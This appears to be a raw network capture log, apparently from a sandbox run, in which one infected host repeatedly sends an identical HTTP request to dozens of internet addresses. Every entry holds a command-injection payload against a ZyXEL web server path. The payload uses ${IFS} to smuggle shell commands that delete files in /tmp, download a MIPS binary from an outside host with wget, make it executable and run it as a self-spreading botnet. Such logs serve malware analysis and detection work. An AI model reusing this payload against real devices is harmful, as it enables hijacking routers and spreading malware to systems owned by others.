                                                Jan 28, 2024 10:16:25.818778038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4589192.168.2.2353220119.14.30.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818825006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4590192.168.2.236078069.42.123.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818839073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4591192.168.2.2342488140.133.240.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818902969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4592192.168.2.2354776101.250.98.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818902969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4593192.168.2.2336258103.31.114.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818945885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4594192.168.2.2350962162.26.109.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818953991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4595192.168.2.2355944136.190.230.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.818986893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4596192.168.2.235724892.188.26.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819014072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4597192.168.2.2351988122.222.119.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819039106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4598192.168.2.233760837.178.18.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819076061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4599192.168.2.235429225.46.91.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819092989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4600192.168.2.2337072170.73.200.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819111109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4601192.168.2.233498050.7.46.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819144964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4602192.168.2.233444090.37.160.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819195032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4603192.168.2.234380450.58.235.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819216013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4604192.168.2.235635613.71.143.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819227934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4605192.168.2.2334632182.234.172.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819253922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4606192.168.2.235758224.139.232.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819277048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4607192.168.2.235171086.2.165.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819319010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4608192.168.2.2347328101.184.127.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819350004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4609192.168.2.2359796138.51.58.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819379091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4610192.168.2.23606949.158.255.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819403887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4611192.168.2.2345208206.49.45.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819417953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4612192.168.2.2353168106.188.140.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819453001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4613192.168.2.23409004.140.206.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819467068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4614192.168.2.2360506138.166.54.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819483042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4615192.168.2.2352820176.87.52.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819534063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4616192.168.2.233432888.12.241.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819566965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4617192.168.2.23534641.236.149.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819576979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4618192.168.2.235425890.14.195.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819608927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4619192.168.2.234494688.176.240.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819653988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4620192.168.2.2343574167.251.35.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.819669962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4621192.168.2.234711240.3.24.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.821835041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4622192.168.2.2356428186.105.164.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.821861982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4623192.168.2.2352482130.169.28.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.821919918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4624192.168.2.2341550190.241.120.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.822433949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4625192.168.2.234778265.17.161.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.822441101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4626192.168.2.2358578155.56.25.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827474117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4627192.168.2.2348070171.34.205.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827511072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4628192.168.2.2341806119.96.190.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827548981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4629192.168.2.2351328150.105.72.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827594042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4630192.168.2.2340370175.37.123.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827615976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4631192.168.2.2344006122.51.56.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827625036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4632192.168.2.234303085.68.152.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827656031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4633192.168.2.235032843.85.36.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827677965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4634192.168.2.2346584217.74.136.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827701092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4635192.168.2.2340292194.149.13.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827753067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4636192.168.2.23543288.226.67.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827768087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4637192.168.2.233956879.255.62.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827791929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4638192.168.2.2333542121.100.129.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827825069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4639192.168.2.235775654.192.242.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827845097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4640192.168.2.2359196199.84.128.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827863932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4641192.168.2.2360848166.67.110.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827881098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4642192.168.2.2360924164.119.108.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827938080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4643192.168.2.2356086170.230.88.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827956915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4644192.168.2.2355482160.62.201.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.827974081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4645192.168.2.233291461.202.225.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828010082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4646192.168.2.235029880.127.110.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828032970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4647192.168.2.2352178204.205.128.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828058004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4648192.168.2.2344164123.129.204.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828075886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4649192.168.2.234232675.222.197.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.828140020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4650192.168.2.235927838.141.213.210443
                                                TimestampBytes transferredDirectionData
